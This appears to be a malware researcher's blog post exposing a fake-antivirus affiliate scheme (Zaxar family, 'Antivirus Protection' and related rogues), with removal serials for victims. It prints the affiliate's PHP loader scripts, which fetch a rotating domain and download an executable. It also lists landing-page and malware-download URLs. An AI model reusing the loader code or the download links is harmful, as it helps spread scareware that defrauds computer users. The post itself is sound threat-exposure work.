FakeAV Affiliate who distribute Zaxar Family

Advert found in Blackhole

First contact the 24 Feb

Then recontact the 25, 6 and more seriously about business the 7 Mar:

9 Mar, loader operational.

"Marketing compagny" no name... no logo... look's like a private affiliate.

• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ

Login:

News:

Statistics:

Promo:

Statistics by promo:

Payement:

Profile:

FAQ:

load1.txt:

<?php

/*
 * Получает ехе и записывает в файл
 *
 */

$fileName="scanner.1";
$afid="you_afid"; // 1
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain=file_get_contents($urlActualDomain);

if (!$actual_domain) my_error("Can't get domain.");
$exe_url="http://$actual_domain/ldpatch/softpatch.php?afid=".$afid;

$baka_exe=file_get_contents($exe_url);

if (strlen($baka_exe)> 0){
    $h = fopen($fileName,"w");
    fwrite($h,$baka_exe);
    fclose($h);    
    echo "OK";
}else{
    my_error("Can't get exe.");
}      
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}

?>

load2.txt:

<?php

/*
 * Load2
 * записает актуальный домен в файл
 *
 */

$fileDomain="domain.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain =file($urlActualDomain);

if (sizeof($actual_domain)== 0 ) my_error("Can't get domain.");

$h = fopen($fileDomain,"w");
$text=implode("", $actual_domain);
fwrite($h,"http://".$text);
fclose($h);

echo "OK";
exit;

////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}
////////////////////////////////////////////////////////////////////////////////
?>

load3.txt

<?php
/*
 *  Load3
 *  дописает к урл ( например /scanner15/?afid=3)
 */

$fileName="my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$h = fopen($fileName,"w");
$text = file($urlActualDomain);
$text=implode("", $text);

fwrite($h,"http://".$text."/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>

This Affiliate spread actually Antivirus Protection (if you want the sample)

Landing pages:

• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465

• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465

• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465

Malware dowload:

• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe

• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe

Also a weird string was found in the promo server: Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs
Maybe it's the same program or maybe he payed the  people of BakaSoft and they selled the system.

Index Of/

Antivirus Protection

According to S!Ri
Antivirus Protection is a fake security software (rogue). It is from the same family as: Security Monitor 2012, Security Solution 2011, Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.

Fake BSoD

Unpack

Anti

Serial

To register (and help removal), copy paste this code: LIC-99D0-1239-KJAS-354S-SQD4-CJKF-KF67-GJ78-FGHK-ZDU6

Kaspersky Lab Technical Support fail by giving a old serial (did they even debugged the FakeAV?)

The following urls were found:

• dns: 1 » ip: 85.17.58.199 - adresse: PRO-BESTMUSIC.US
http://pro-bestmusic.us/ea.php?p=12&aid=

• dns: 1 » ip: 85.17.58.199 - adresse: FINELABOZP.IN
http://finelabozp.in/ea.php?p=1&aid=1

• dns: 1 » ip: 195.226.218.138 - adresse: ANTIVIRUSPROTECTION2012.COM
http://www.antivirusprotection2012.com/buy/index/1/9B11F1579114D8F08FE8069672F71172

• dns: 1 » ip: 184.22.135.174 - adresse: SAFEBILLINGSERVICE.COM
http://safebillingservice.com/buy/?affiliate_id=1&machine_id=&product_domain=antivirusprotection2012.com

Thanks to kyREcon :)

Security Solution 2011

Security Solution 2011 is a fake security software (rogue). It is from the same family as: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.

Security Solution 2011 displays a lot of disturbing warning messages pushing users to purchase a license.
To register (and help removal), enter this serial code: LIC2-00A6-234C-B6A9-38F8-F6E2-0838-F084-E235-6051-18B3

Fake suspended page:

Antimalware Tool

Antimalware Tool is a fake security software (rogue). It is from the same family as: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.

Antimalware Tool displays a lot of disturbing warning messages pushing users to purchase a license.
If your PC is infected with Antimalware Tool, follow pcthreat guide to remove the infection.